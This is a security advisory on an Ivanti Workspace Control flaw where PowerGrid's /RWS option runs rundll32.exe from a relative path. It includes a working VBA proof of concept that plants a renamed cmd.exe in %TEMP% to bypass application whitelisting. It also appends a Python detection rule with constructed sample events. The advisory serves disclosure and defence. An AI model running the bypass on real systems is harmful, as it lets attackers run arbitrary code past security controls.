------------------------------------------------------------------------
Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS
command line argument
------------------------------------------------------------------------
Yorick Koster, August 2018

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the PowerGrid application will execute rundll32.exe
from a relative path when it is started with the /RWS command line
option. An attacker can abuse this issue to bypass Application
Whitelisting in order to run arbitrary code on the target machine.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Ivanti Workspace Control version
10.2.700.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was resolved in Ivanti Workspace Control version 10.2.950.0.
PowerGrid now uses the GetSystemDirectory() function to construct an
absolute path to rundll32.exe.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html


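------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------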
The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder.

Private Sub PowerGridAWLBypass()
   On Error Resume Next
   Dim tmpPath, resPath, targetPath
   tmpPath = Environ("TEMP")
   resPath = Environ("RESPFDIR")
   targetPath = Environ("SystemRoot") & "\System32\cmd.exe"
   
   ' Place a copy of cmd.exe in %TEMP% under the name rundll32.exe
   FileCopy targetPath, tmpPath & "\rundll32.exe"
   ' Make %TEMP% the current directory so the relative lookup resolves there
   ChDir tmpPath
   ' Create a minimal XML file to pass to the /RWS option
   Dim fso As Object
   Set fso = CreateObject("Scripting.FileSystemObject")
   Dim oFile As Object
   Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml")
   oFile.WriteLine "<foo></foo>"
   oFile.Close
   Set fso = Nothing
   Set oFile = Nothing
   ' Start PowerGrid with /RWS; it runs rundll32.exe from a relative path
   Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus
End Sub
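
A detection check for the behaviour shown above, added here as an example and not part of the original advisory or of Ivanti's code: it flags process-creation events where pwrgrid.exe started a rundll32.exe that is not in a system directory. The field names follow Sysmon process-creation events (Event ID 1); the C:\Windows system root, the pwrgrid.exe install path and all sample events are constructed assumptions.

```python
import ntpath

# Assumption: Windows is installed in C:\Windows; adjust for other system roots.
TRUSTED_DIRS = {ntpath.normcase(d)
                for d in (r"C:\Windows\System32", r"C:\Windows\SysWOW64")}


def _norm(path):
    # Collapse ".." segments and fold case so comparisons match Windows semantics.
    return ntpath.normcase(ntpath.normpath(path))


def is_planted_rundll32(event):
    """True when pwrgrid.exe spawned a 'rundll32.exe' outside the system directories."""
    image, parent = _norm(event["Image"]), _norm(event["ParentImage"])
    if ntpath.basename(parent) != "pwrgrid.exe":
        return False
    if ntpath.basename(image) != "rundll32.exe":
        return False
    return ntpath.dirname(image) not in TRUSTED_DIRS


def find_hits(events):
    """Return (image, parent_started_with_rws) for every suspicious event."""
    return [(e["Image"], "/rws" in e.get("ParentCommandLine", "").lower())
            for e in events if is_planted_rundll32(e)]


# Constructed sample events (not real telemetry); the pwrgrid.exe path is a placeholder.
PWRGRID = r"C:\Example\pwrgrid.exe"
RWS_CMD = "pwrgrid.exe /RWS foo.xml"
TEMP_COPY = r"C:\Users\alice\AppData\Local\Temp\rundll32.exe"
SAMPLE_EVENTS = [
    # Legitimate child, including a differently cased path.
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": PWRGRID, "ParentCommandLine": RWS_CMD},
    {"Image": r"c:\windows\SYSTEM32\RUNDLL32.EXE", "ParentImage": PWRGRID, "ParentCommandLine": RWS_CMD},
    # Copy started from the user's temp folder.
    {"Image": TEMP_COPY, "ParentImage": PWRGRID, "ParentCommandLine": RWS_CMD},
    # Path that only looks like System32 until ".." is resolved.
    {"Image": r"C:\Windows\System32\..\Temp\rundll32.exe", "ParentImage": PWRGRID, "ParentCommandLine": RWS_CMD},
    # Different parent: outside the scope of this rule.
    {"Image": TEMP_COPY, "ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe"},
]

if __name__ == "__main__":
    for image, rws in find_hits(SAMPLE_EVENTS):
        print(f"suspicious rundll32.exe: {image} (parent used /RWS: {rws})")
```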